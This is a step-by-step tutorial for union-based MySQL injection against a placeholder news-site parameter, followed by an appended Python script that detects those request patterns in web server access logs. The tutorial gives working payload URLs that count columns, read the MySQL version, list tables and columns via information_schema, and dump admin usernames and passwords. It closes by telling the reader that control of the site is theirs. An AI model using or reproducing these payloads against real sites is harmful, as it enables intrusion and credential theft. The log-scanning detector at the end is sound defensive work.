MySQL Injection Step by Step

SQL injection is an attack carried out from the client side by modifying an SQL command that the application already holds in memory. It is a technique for exploiting web applications that use a database for data storage.

Things you need to know before doing MySQL SQL injection:
characters: ' or -
comments: /* or --
information_schema by version: available in MySQL version 5.x, not supported in MySQL version 4.x

===========
=First step:=
===========

Find a target.
example: [site]/berita.php?id=100

Add the character ' at the end of the URL, or add the character "-", to see if there is an error message.
example: [site]/berita.php?id=100' or
[site]/berita.php?id=-100

so that the error message appears.

==========
=Second step:=
==========

Find and count the number of tables contained in the database.
Use the command: order by

example: [site]/berita.php?id=-100+order+by+1-- or
[site]/berita.php?id=-100+order+by+1/*

Check the numbers one by one.
example: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

Continue until an error appears or the error message goes missing.
example: [site]/berita.php?id=-100+order+by+9--

This means the number we take is 8,
so it becomes [site]/berita.php?id=-100+order+by+8--

===========
=Third step:=
===========

To find out which number is displayed, use the command union.
Because the error appeared at number 9,
use: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Suppose the number that comes out is 5.

Use the command version() or @@version to check the version of MySQL in use. Put the command in place of the number that came out above.
example: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- or
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

Look at the version in the reply. If it is version 4, leave it alone: in version 4 we have to guess the tables and columns on the site ourselves, because the command from+information_schema cannot be used.

If it is version 5 you are lucky: there is no need to guess the tables and columns as in version 4, because in version 5 we can use the command from+information_schema.

============
=Fourth step:=
============

To display the tables that exist on the site:
command: table_name >>> put in place of the number that came out earlier
command: +from+information_schema.tables/* >>> put after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

example: the table that appears is "admin"

===========
=Fifth step:=
===========

To display all the contents of the table, the command is:
command: group_concat(table_name) >>> put in place of the number that came out earlier
command: +from+information_schema.tables+where+table_schema=database() >>> put after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= Sixth step: =
=============

command: group_concat(column_name) >>> put in place of the number that came out earlier
command: +from+information_schema.columns+where+table_name=0xhexa-- >>> put after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

At this stage you are required to convert the word from the table contents to hexadecimal. A website that can be used for the conversion:

www.ascii-convert.co.cc

For example, if the word to convert is admin, it becomes 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--

============
=Seventh step:=
============

To output the contents of what was pulled from the table earlier, the method is:

command: concat_ws(0x3a,columns whose contents you want to output) >>> put in place of the number that came out earlier
command: +from+(name of the source table) >>> put after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,column contents),6,7,8+from+(name of the source table)--

For example, the words that came out were id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= Eighth step:=
==============

The last step is to search for the admin or login page.

After that it is up to you, because control of the web site is in your hands.
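Each step of the walkthrough above leaves a recognisable request in the web server access log. The following is an added example, not code from the original post, that scans combined-format access log lines for those request shapes and groups the stages seen per client. The rule names, the focus on the `id` parameter and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One rule per stage of the walkthrough; applied to the URL-decoded query string.
RULES = [
    ("error probe", re.compile(r"(?:^|&)id=[^&]*(?:'|--|/\*)", re.I)),
    ("column count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version probe", re.compile(r"@@version|\bversion\s*\(", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("concat extraction", re.compile(r"\b(?:group_concat|concat_ws)\s*\(", re.I)),
    ("hex literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) [^"]*" \d{3}')

def classify(target):
    """Return the names of all rules matched by one request target."""
    _, _, query = target.partition("?")
    decoded = unquote_plus(query)  # '+' becomes a space, %27 becomes '
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Map client IP -> set of stages seen, dropping clients with no hits."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits[m.group(1)].update(classify(m.group(2)))
    return {ip: stages for ip, stages in hits.items() if stages}

# Constructed sample log (documentation IP ranges, paths as in the walkthrough).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2024:09:59:00 +0000] "GET /berita.php?id=100 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Mar/2024:09:59:05 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900',
    '203.0.113.9 - - [10/Mar/2024:10:00:01 +0000] "GET /berita.php?id=100%27 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Mar/2024:10:00:09 +0000] "GET /berita.php?id=-100+order+by+9-- HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Mar/2024:10:00:15 +0000] "GET /berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- HTTP/1.1" 200 700',
    '203.0.113.9 - - [10/Mar/2024:10:00:22 +0000] "GET /berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, sorted(stages))
```

A client that accumulates several distinct stages in a short window is a much stronger signal than any single rule hit, which is why the result is grouped per IP.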
